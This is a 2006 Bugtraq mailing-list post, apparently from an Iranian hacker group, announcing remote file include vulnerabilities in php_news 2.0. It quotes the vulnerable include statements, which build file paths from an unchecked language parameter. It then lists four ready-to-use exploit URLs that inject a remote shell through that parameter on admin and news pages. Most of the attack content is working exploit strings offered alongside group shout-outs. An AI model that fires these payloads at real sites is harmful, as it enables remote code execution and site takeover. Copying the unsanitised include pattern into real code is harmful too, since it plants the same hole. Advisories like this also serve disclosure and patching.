php_news => 2.0 Remote File Include Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: php_news => 2.0 Remote File Include Vulnerabilities
From: h4ck3riran@xxxxxxxxx
Date: 25 Sep 2006 20:14:42 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

# php_news => 2.0 Remote File Include Vulnerabilities


# Script.............. :php_news
# Discovered By.... : Root3r_H3ll       
# Location .......... : Iran
# Class..............  : Remote
# Original Advisory : http://Www.PersainFox.com
# We ArE : Root3r_H3LL & Arash.Rj
# <Spical TNX Irania Hackers :
  ( Aria-Security , Crouz , DeltaHacking , Iranhackers
Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev )
 
# </\/\\/_ 10\/3 15 1|)\4/\/
          |)\0073|)\_|-|311

# CodEs :

include_once("admin/language/".$language."_news.php")
include("language/".$language."_catagory.php")
include_once("language/".$language."_news.php");
include("language/".$language."_users.php")

# ExPloits :

Www.Site.coM/[path]/admin/user_user.php?language=Sh3ll
Www.Site.coM/[path]/admin/news.php?language=Sh3ll
Www.Site.coM/[path]/admin/catagory.php?language=Sh3ll
Www.Site.coM/[path]/creat_news_all.php?language=Sh3ll

Prev by Date: QB ( QuickBlogger ) =>1.4 Remote File Include Vulnerabilities
Next by Date: Back-end => 0.4.5 Remote File Include Vulnerabilities
Previous by thread: QB ( QuickBlogger ) =>1.4 Remote File Include Vulnerabilities
Next by thread: Back-end => 0.4.5 Remote File Include Vulnerabilities
Index(es):
- Date
- Thread